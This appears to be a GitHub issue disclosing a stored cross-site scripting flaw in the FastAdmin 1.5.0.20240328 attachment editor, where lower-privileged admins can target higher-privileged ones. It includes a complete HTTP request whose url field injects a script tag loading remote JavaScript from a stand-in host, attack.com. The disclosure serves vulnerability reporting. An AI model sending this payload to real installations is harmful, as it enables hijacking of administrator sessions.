You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
FastAdmin is a lightweight and efficient management background framework based on ThinkPHP. It is widely used for its simplicity and powerful features.
FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the backend's General Management - Attachment Management section.
Details
Administrators with access to manage attachments (e.g., secondary administrators) can exploit this vulnerability to target users with higher privileges.
The vulnerability can be triggered by manipulating the row.url of the attachments.
Proof of Concept (POC)
POST /[admins' url].php/general/attachment/edit/ids/4?dialog=1 HTTP/1.1
Host: your-ip
Content-Length: 349
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [Cookies omitted for brevity]
Connection: close
row%5Bcategory%5D=unclassed&row%5Burl%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fattack.com/1.js%2FtndM%3E%2F%2F&row%5Bimagewidth%5D=1056&row%5Bimageheight%5D=626&row%5Bimagetype%5D=png&row%5Bimageframes%5D=0&row%5Bfilename%5D=test.png&row%5Bfilesize%5D=24535&row%5Bmimetype%5D=image%2Fpng&row%5Bextparam%5D=&row%5Buploadtime%5D=2024-08-01+15%3A00%3A40&row%5Bstorage%5D=local
The text was updated successfully, but these errors were encountered:
Summary
FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the backend's General Management - Attachment Management section.
Details
Administrators with access to manage attachments (e.g., secondary administrators) can exploit this vulnerability to target users with higher privileges.
The vulnerability can be triggered by manipulating the
row.url
of the attachments.Proof of Concept (POC)
The text was updated successfully, but these errors were encountered: